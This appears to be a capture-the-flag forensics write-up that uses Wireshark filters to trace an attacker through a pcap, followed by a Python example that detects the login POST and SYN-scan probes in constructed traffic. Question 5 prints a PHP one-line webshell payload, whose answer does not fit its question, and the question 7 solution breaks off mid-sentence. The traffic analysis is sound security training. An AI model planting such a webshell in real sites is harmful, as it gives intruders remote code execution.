Wireshark traffic packet analysis case

Commonly used display-filter commands for the Wireshark packet capture tool
Test file: https://pan.baidu.com/s/1QuMdefZHSqlaLSHaMVGb4w
Extraction code: tmjs

  1. Use Wireshark to view and analyze the attack.pcapng data packet file, find out the hacker's IP address by analyzing the data packet attack.pcapng, and submit the hacker's IP address as FLAG (form: [IP address]):
    Solution:
    First filter the HTTP GET and POST request packets:
    http.request.method==GET
    Two login-page requests are found: one from 172.16.1.10 to 172.16.1.101, the other from 172.16.1.102 to 172.16.1.101, but neither contains a username or password, so the credentials were presumably sent as POST parameters.
    http.request.method==POST
    The login username and password are found in the packet sent from 172.16.1.102 to 172.16.1.101, so the hacker's IP address is 172.16.1.102.
    flag{172.16.1.102}

  2. Continue to view the packet file attack.pcapng, analyze which ports the hacker scanned, and submit all of them, from low to high, as FLAG (form: [port 1, port 2, port 3 ..., port n]):
    Solution:
    Filter the packets whose source IP is 172.16.1.102 and that use TCP (nmap port scanning is based on the TCP protocol):
    ip.src==172.16.1.102&&tcp
    The scanned ports are 21, 80, 23, 3389, 445 and 5007. For details on what nmap port-scan traffic looks like, see this article.
    flag{ 21, 23, 80, 445, 3389, 5007}

  3. Continue to look at the packet file attack.pcapng to analyze what the hacker's final username is, and submit the username as FLAG (form: [user name]):
    Solution:
    In question 1, the username and password were found in frame 3745.
    flag{Lancelot}

  4. Continue to check the packet file attack.pcapng to analyze what password the hacker finally obtained, and submit the password as FLAG (form: [password]):
    Solution:
    See the screenshot for question 3.
    flag {12369874}

  5. Continue to check the packet file attack.pcapng to analyze what password the hacker uses to connect to the one-sentence Trojan (webshell), and submit the one-sentence password as FLAG (form: [one-sentence password]):
    Solution:
    The one-sentence Trojan is found in frame 3778 of the capture.
    flag{@eval(base64_decode($_POST[z0]));}

  6. Continue to check the packet file attack.pcapng to analyze what file the hacker downloaded, and submit the file name and suffix as FLAG (form: [file name.suffix]):
    Solution:
    First check the GET request packets:
    ip.src==172.16.1.102&&http.request.method==GET
    The hacker at 172.16.1.102 performed SQL injection against the index.php page and then visited upload.php. Next, look at the POST requests to upload.php:
    ip.src==172.16.1.102&&http.request.method==POST
    The request references the path C: \ \phpstudy\ \wiw \ \fittingroom\ lupload\flag.zip, so the downloaded file is flag.zip.
    flag{flag.zip}

  7. Continue to check the packet file attack.pcapng to extract the file downloaded by the hacker, and submit the content of the file as FLAG (form: [file content]):
    Solution:
    Right-click the packet from question 6, select Follow TCP Stream, save the data as Raw, then open the
    flag{Manners maketh man}
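
The logic behind questions 1 and 2, as an added Python example that is not part of the original write-up: it rebuilds the display filters http.request.method==POST and ip.src==172.16.1.102&&tcp as code over constructed IPv4/TCP packets. The hosts and the credentials are the ones from the write-up; the form field names username/password, the probe order and the Ethernet-less packet layout are assumptions made for the example.

```python
import struct
from urllib.parse import parse_qs

SYN, ACK = 0x02, 0x10
ATTACKER, VICTIM, OTHER = "172.16.1.102", "172.16.1.101", "172.16.1.10"  # hosts from the write-up

def build_packet(src, dst, sport, dport, flags, payload=b""):
    """Constructed minimal IPv4+TCP packet (no Ethernet header, checksums left zero)."""
    ip_src, ip_dst = (bytes(int(o) for o in a.split(".")) for a in (src, dst))
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0, ip_src, ip_dst)
    tcp_hdr = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 8192, 0, 0)
    return ip_hdr + tcp_hdr + payload

def parse_packet(raw):
    """Decode the IPv4/TCP fields the display filters refer to (ip.src, tcp ports, flags, payload)."""
    ihl = (raw[0] & 0x0F) * 4
    if raw[9] != 6:  # protocol field: only TCP is of interest here
        return None
    tcp = raw[ihl:]
    sport, dport = struct.unpack("!HH", tcp[:4])
    data_off = (tcp[12] >> 4) * 4
    return {"src": ".".join(map(str, raw[12:16])), "dst": ".".join(map(str, raw[16:20])),
            "sport": sport, "dport": dport, "flags": tcp[13], "payload": tcp[data_off:]}

def find_hacker_ip(packets):
    """Question 1 logic (http.request.method==POST): the source that POSTs login credentials."""
    for p in packets:
        if p and p["payload"].startswith(b"POST "):
            body = p["payload"].partition(b"\r\n\r\n")[2].decode("utf-8", "replace")
            fields = parse_qs(body)
            if "username" in fields and "password" in fields:  # assumed form field names
                return p["src"], fields["username"][0], fields["password"][0]
    return None

def scanned_ports(packets, src):
    """Question 2 logic (ip.src==X && tcp), narrowed to bare SYNs: the probes of a SYN scan."""
    return sorted({p["dport"] for p in packets
                   if p and p["src"] == src and p["flags"] & (SYN | ACK) == SYN and not p["payload"]})

def sample_traffic():
    """Constructed capture: a port scan, an innocent GET from another host, the attacker's login POST."""
    pk = [build_packet(ATTACKER, VICTIM, 40000 + i, port, SYN) for i, port in enumerate((3389, 21, 445, 80, 23, 5007))]
    pk.append(build_packet(OTHER, VICTIM, 50001, 80, ACK, b"GET /login.php HTTP/1.1\r\nHost: victim\r\n\r\n"))
    body = b"username=Lancelot&password=12369874"
    pk.append(build_packet(ATTACKER, VICTIM, 50002, 80, ACK,
                           b"POST /login.php HTTP/1.1\r\nHost: victim\r\nContent-Length: %d\r\n\r\n" % len(body) + body))
    return [parse_packet(raw) for raw in pk]
```

Running `find_hacker_ip(sample_traffic())` returns the attacker address with the captured credentials, and `scanned_ports` returns the probed ports already ordered from low to high as the question requires.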

Origin blog.csdn.net/mcmuyanga/article/details/114524270